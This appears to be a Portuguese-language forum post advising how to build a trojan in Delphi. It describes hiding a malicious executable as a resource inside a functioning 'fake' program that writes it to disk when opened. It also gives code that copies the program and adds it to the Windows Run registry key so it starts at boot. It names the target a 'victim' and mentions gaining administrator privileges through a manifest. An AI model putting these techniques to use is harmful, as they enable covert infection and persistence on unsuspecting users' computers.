Vc pode inserir o executavel que deseja infectar a aquina como um "recurso" arquivos .rc
Então cria todo um programa "fake" com as funçoes perfeitamente funcionais, ao abri-lo o trojan ira abri o "resource" em formato de stream e sava-lo no lugar que vc especificar... entao em resumo vc tera 2 programs dentro de 1 so... o Main apllication e um "compactado" dentro dele.

Teria outa forma simples tb atraves dos comandos:

copyfile(pwidechar(application.ExeName),pwidechar( local e nome da copia),false);

em seguida o codigo para executar a segunda aplicação junto ao windows.

app_auto_run(local e nome da copia,true);

onde app_auto_run é uma procedure que irar editar a chave run no registro do windows algo do tipo:

procedure app_auto_run(nome_dado_registro:string;autorun:boo lean);
// executar aplicação junto ao windows
// autorun = true sim
// autorun = false não
var
Reg: TRegistry;
begin
Reg := TRegistry.Create;
Reg.rootkey:=HKEY_LOCAL_MACHINE;
Reg.Openkey('SOFTWARE\MICROSOFT\WINDOWS\CURRENTVER SION\RUN',false);
case autorun of
true:Reg.WriteString(nome_dado_registro,Applicatio n.ExeName);
false:Reg.DeleteValue(nome_dado_registro);
end;
Reg.closekey;
Reg.Free;
end;

lembrando de usar a unit Registry em uses claro e que a vitima não possua win 7 neste caso
terar que fazer um manifest para que sua aplicação ganhe privilegio adiministrativo e consiga
realizar a copia da aplicação no disco e tb a edição no registro do windows.